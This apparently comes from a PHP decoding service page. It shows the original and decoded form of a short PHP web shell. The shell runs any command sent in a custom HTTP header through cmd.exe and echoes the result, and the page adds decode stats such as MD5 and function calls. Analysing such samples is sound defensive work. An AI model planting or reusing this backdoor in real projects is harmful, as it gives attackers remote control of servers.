Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if($_SERVER['HTTP_E1044'] != null){ echo exec("cmd.exe /c ".$_SERVER['HTTP_E1044'])..
Decoded Output download
<?php
if($_SERVER['HTTP_E1044'] != null){
echo exec("cmd.exe /c ".$_SERVER['HTTP_E1044']);
}
?>
Did this file decode correctly?
Original Code
<?php
if($_SERVER['HTTP_E1044'] != null){
echo exec("cmd.exe /c ".$_SERVER['HTTP_E1044']);
}
?>
Function Calls
exec | 1 |
Stats
MD5 | 12ae3fbbb302354236e480a852a98a76 |
Eval Count | 0 |
Decode Time | 111 ms |